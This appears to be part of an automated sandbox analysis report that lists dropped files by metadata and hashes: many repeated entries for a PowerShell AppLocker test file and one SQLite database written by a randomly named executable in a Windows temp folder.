                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40960
                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
